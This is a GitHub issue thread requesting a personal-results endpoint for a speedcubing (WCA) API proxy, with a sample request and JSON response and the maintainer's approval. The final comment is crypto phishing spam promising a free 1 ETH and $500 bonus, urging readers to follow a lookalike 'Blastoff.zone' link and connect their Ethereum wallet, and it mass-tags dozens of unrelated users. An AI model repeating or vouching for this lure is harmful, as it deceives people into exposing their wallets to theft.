### ISSUE TITLE
Feature request: make another API proxy for perosnal results

### ISSUE THREAD

**Issue by shumengliu** [niekh1234/wca-api#1]
I am willing to contribute.

**Comment by shumengliu** [comment]
Sample request
```
curl https://wca-proxy.niekh.com/api/v1/persons/2015DOEJ01
```

Sample response format
```
{
  "name": "John Doe",
  "wca_id": "2015DOEJ01",
  "events": [
    {
      "slug": "333",
      "single": 10.23,
      "average": 12.45
    },
    {
      "slug": "222",
      "single": 4.56,
      "average": 6.78
    },
    {
      "slug": "444",
      "single": 23.45,
      "average": 26.78
    }
  ]
}
```

**Comment by niekh1234** [comment]
Yes good idea! 100% will be added

**Comment by ChrisBuckets** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
shrry2, @leyr1112, @ToolKitPlus, @ryuki, @clauxx, @foriacus, @Metroxe, @tenondecrpc, @Kumpon-J-Sotsukpiam, @Jianto87, @CHENkai8385, @dong0714, @amumubuku, @ShaunLWM, @PanyaNaknoppakun, @alooooooone, @fidohnjk, @RashedBD444, @Vakhenko, @lucilamia, @dequan1331, @mattrobertson15, @dynamicguy, @dgknca, @navigatorsvs1232009, @fx-fusion, @exherb, @hardjhonatan, @ellison13tj, @happyingking, @Adekunlementor, @BinksGao, @tjones0808, @mkhalesi, @gibsonezeh, @setianke, @rhifat, @SuSuSoo, @iddriss, @gxz2019, @youngchief-btw, @MarekSyk, @ilker0, @Normalizex, @cyboerg42, @IvanZen, @AntonisFK, @qbz008, @SimpleChop, @gppo66
